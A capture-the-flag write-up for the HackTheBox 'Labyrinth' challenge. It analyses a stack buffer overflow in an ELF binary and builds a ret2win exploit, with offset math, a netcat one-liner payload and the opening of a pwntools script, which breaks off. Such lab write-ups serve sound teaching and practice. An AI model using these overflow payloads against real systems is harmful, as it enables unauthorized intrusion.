Labyrinth - HackTheBox

Description

You find yourself trapped in a mysterious labyrinth, with only one chance to escape. Choose the correct door wisely, for the wrong choice could have deadly consequences.

Binary Analysis

File: ELF 64-bit executable, not stripped

Security:

• No PIE (fixed addresses)
• No stack canary
• NX enabled (no shellcode execution)
• Full RELRO

Key findings:

• Function escape_plan at 0x401255 reads and prints flag.txt
• This is a classic ret2win scenario

Vulnerability

1. Program displays 100 doors and asks user to select one
2. Selecting door 69 triggers special path: "Fly like a bird and be free!"
3. Program asks if user wants to change choice
4. Second input uses fgets(s, 0x44, stdin) - reads 68 bytes
5. Buffer s is at rbp-0x30 (48 bytes from rbp)

Buffer overflow math:

• Buffer size: 48 bytes
• Read size: 68 bytes (0x44)
• Overflow: 20 bytes
• Offset to return address: 48 (buffer) + 8 (saved rbp) = 56 bytes

Exploitation Strategy

1. Select door 69 to reach vulnerable code path
2. Overflow buffer to overwrite return address
3. Use ret gadget (0x401016) for 16-byte stack alignment (x86_64 ABI requirement)
4. Jump to escape_plan function to print flag

Solution

Bash one-liner

(echo '69'; sleep 1; printf 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x16\x10\x40\x00\x00\x00\x00\x00\x55\x12\x40\x00\x00\x00\x00\x00'; sleep 3) | nc TARGET_IP TARGET_PORT

Pwntools exploit

#!/usr/bin/env python3
from pwn import *

# Connection
p = remote('TARGET_IP', TARGET_PORT)
# p = process('./labyrinth')  # for local testing

# Select door 69 to reach vulnerable path
p.sendlineafter(b'>> ', b'69')

...